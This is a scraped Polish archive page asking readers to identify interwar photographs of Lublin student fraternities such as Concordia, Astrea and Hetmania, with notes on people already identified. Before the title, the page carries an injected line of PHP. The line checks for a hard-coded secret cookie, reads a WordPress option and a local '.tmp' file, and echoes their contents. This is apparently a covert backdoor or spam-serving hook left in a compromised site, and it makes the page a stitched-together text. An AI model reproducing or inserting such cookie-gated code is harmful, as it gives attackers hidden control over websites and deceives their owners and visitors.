if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Identyfikacja fotografii z Lublina

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego fotografie, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii). Celem akcji jest uzupełnienie możliwie wielu brakujących informacji.

Wiele nieopisanych bądź nie w pełni opisanych fotografii znajduje się na niemal wszystkich stronach wirtualnego Muzeum Polskich Korporacji Akademickich. Od 2010 r. dodatkowo niektóre z nich oraz wiele innych nieopisanych fotografii prezentowane są w osobnych działach tworzonych zbiorczo dla identyfikacji fotografii korporacyjnych z jednego ośrodka akademickiego (Identyfikacja fotografii z Wilna, Identyfikacja fotografii z Warszawy, Identyfikacja fotografii z Lublina etc). Fotografie i insygnia korporacyjne, w przypadku których nie można określić ośrodka akademickiego, z którego pochodzą, można zobaczyć w zbiorczym zestawieniu - Identyfikacja fotografii.

Zależałoby nam na ustaleniu możliwie wielu istotnych dla opisu fotografii (bądź innych pamiątek) faktów, w szczególności nazwy korporacji ze zdjęcia, osoby/osób na nim przedstawionych, miejsca i czasu wykonania fotografii. Będziemy wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych zdjęć i innych pamiątek korporacyjnych (vide Kontakt).

Czapka korporacyjna (?) z Lublina (?)

0.1. Czapka studencka (?), prawdopodobnie z Lublina (?).

Czapka jest ciemniejsza niż na fotografii, a jej kolor trudny do określenia: ciemnowiśniowo-brązowy (ceglany). Dookoła widoczny jest dwukolorowy otok: zielono-ciemnowiśniowo/brązowy(ceglany).

Zgodnie z opisem wewnątrz czapki została wykonana przez “Al. Antosik Lublin Kościuszki 2″.

Czapka miała należeć do Kazimierza Dobrzyńskiego (ur. 24 VIII 1913, Lublin - zm. 16 III 2003, Skarżysko), kawalera i inwalidy wojennego.

Nie ma pewności, że jest to czapka korporacyjna, a nawet studencka.

Korporacja z Lublina (?), przed 1932 r.

0.1. Korporacja prawdopodobnie z Lublina (?), przed 1932 r.

Fotografia niezidentyfikowanej korporacji z Lublina, pierwszy z prawej klęczy Jan Szociński. Zdjęcie zapewne pochodzi sprzed 1932 r. kiedy Jan Szociński skończył studia.

_________________________________________________________________________________________

Dwóch członków prawd. Concordii, Lublin lata 20-te.

1.1. Dwóch członków Concordii (?), Lublin lata 20-te.

Fotografia przedstawia dwóch korporantów, prawdopodobnie członków Concordii z lat 20-tych. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także daty zrobienia fotografii.

Pogrzeb ze sztandarem Concordii, Lublin lata 20-te.

1.2. Pogrzeb ze sztandarem Concordii, Lublin lata 20-te.

Fotografia przedstawia pogrzeb, na którym widoczny jest między innymi sztandar Concordii. Istotne byłoby ustalenie okoliczności wykonania fotografii, jak także tożsamości osób na zdjęciu.

Poczet sztandarowy Concordii, Lublin 1929 r.

1.3. Poczet sztandarowy Concordii w 1929 r.

Fotografia przedstawia poczet sztandarowy Concordii w 1929 r. (piąty od lewej Jerzy Kalicki). Istotne byłoby ustalenie tożsamości pozostałych osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

Poczet sztandarowy Concordii w dniu Święta Niepodległości 11 listopada 1928 r., od lewej stoją: NN, Tadeusz Głuchowski, Kazimierz Królikowski, ze sztandarem Franciszek Rzączyński, Marian Kalicki, prezes Jerzy Wilski. Identyfikacji dokonano dnia 11 IX 2010 r. dzięki pomocy Tomasza Rowińskiego.

Prezydium i grupa członków Concordii (Hetmanii?), Lublin druga poł. lat. 20-tych.

1.4. Prezydium i grupa członków Concordii (Hetmanii?) w drugiej poł. lat. 20-tych.

Fotografia przedstawia Prezydium i grupę członków Concordii (Hetmanii?). Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

Uroczystości 3-lecia Hetmanii, od lewej stoi: 1. Henryk Mogilnicki, od lewej siedzą: 3. Eugeniusz Litwiński, 4. Kazimierz Kozłowski, Lublin 12 II 1929 r. Identyfikacja dokonana dnia 22 III 2014 r. przez Wojciecha Gajewskiego na podstawie opisu fotografii z albumu Adama Gajewskiego.

Czterech członków Concordii, Lublin 1936 r.

1.5. Czterech członków Concordii.

Fotografia przedstawia czterech członków Concordii na ulicy w Lublinie w 1936 r. (trzeci od lewej Tadeusz Kaszubski). Istotne byłoby ustalenie tożsamości pozostałych osób na zdjęciu, jak także miejsca wykonania fotografii.

Pierwszy od lewej Jerzy Zyskowski, identyfikacja dnia 24 VI 2013 r. dzięki pomocy córki Elżbiety Zyskowskiej.

Concordia, Lublin 1938 r.

1.6. Grupa członków Concordii w 1938 r.

Fotografia przedstawia grupę członków Concordii w 1938 r. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także okoliczności wykonania fotografii.

W górnym rzędzie czwarty od lewej Eugeniusz Szyszkowski, identyfikacja dnia 8 VII 2013 r. dzięki pomocy wnuczki Małgorzaty Szyszkowskiej.

Concordia, Lublin 1938 r.

1.7. Grupa członków Concordii w 1938 r. II

Fotografia przedstawia grupę członków Concordii w 1938 r., być może na komersie Concordii. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także okoliczności wykonania fotografii.

_________________________________________________________________________________________

Korporant z Astrei, 1938 r.

2.1. Korporant z Astrei.

Fotografia przedstawia członka Astrei. Istotne byłoby ustalenie tożsamości osoby na zdjęciu.

Korporant z Astrei, prawd. koniec lat 20-tych.

2.2. Korporant z Astrei.

Fotografia przedstawia członka Astrei. Istotne byłoby ustalenie tożsamości osoby na zdjęciu, jak i daty zrobienia zdjęcia.

Prawd. korporant z Astrei, prawd. koniec lat 20-tych.

2.3. Prawd. korporant z Astrei.

Fotografia przedstawia prawdopodobnie członka Astrei. Istotne byłoby ustalenie tożsamości osoby na zdjęciu.

Astrea, Lublin 1928 r.
2.4. Astrea, Lublin 1928 r.

Fotografia przedstawia członków Astrei. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

Astrea, prawd. druga poł. lat 20-tych.
2.5. Astrea, prawd. druga poł. lat 20-tych

Fotografia przedstawia członków Astrei. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

Astrea, od lewej: NN, NN, prof. Henryk Jakubanis, NN, NN, NN, prof. Bolesław Sekutowicz, prawd. druga poł. lat 20-tych.
2.6. Członkowie honorowi Astrei, prawd. druga poł. lat 20-tych

Fotografia przedstawia między innymi członków honorowych Astrei. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

Członkowie Astrei, prawd. druga poł. lat 20-tych.
2.7. Członkowie Astrei, prawd. druga poł. lat 20-tych.

Fotografia przedstawia trzech członków Astrei. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

Poczet sztandarowy Astrei, prawd. druga poł. lat 20-tych.
2.8. Poczet sztandarowy Astrei, prawd. druga poł. lat 20-tych.

Fotografia przedstawia trzech członków Astrei. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

_________________________________________________________________________________________

Czterech członków Korabji, Lublin druga poł. lat 30-tych.

3.1. Czterech członków Korabji.

Fotografia przedstawia czterech członków Korabji. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak i daty wykonania fotografii.

_________________________________________________________________________________________

Poczet sztandarowy Hetmanii, Święto Niepodległości, Lublin 11 XI 1933 r.

4.1. Poczet sztandarowy Hetmanii w 1933 r.

Fotografia przedstawia poczet sztandarowy Hetmanii na uroczystościach Święta Niepodległości w 1933 r. Istotne byłoby ustalenie tożsamości osób na zdjęciu.

Korporant z Hetmanii, 1938 r.

4.2. Korporant z Hetmanii.

Fotografia przedstawia członka Hetmanii. Istotne byłoby ustalenie tożsamości osoby na zdjęciu.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 24 VII 2010 r.
Ostatnia zmiana: 8 VIII 2015 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Identyfikacja fotografii z Lublina, (na:) www.archiwumkorporacyjne.pl, stan 8 VIII 2015 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }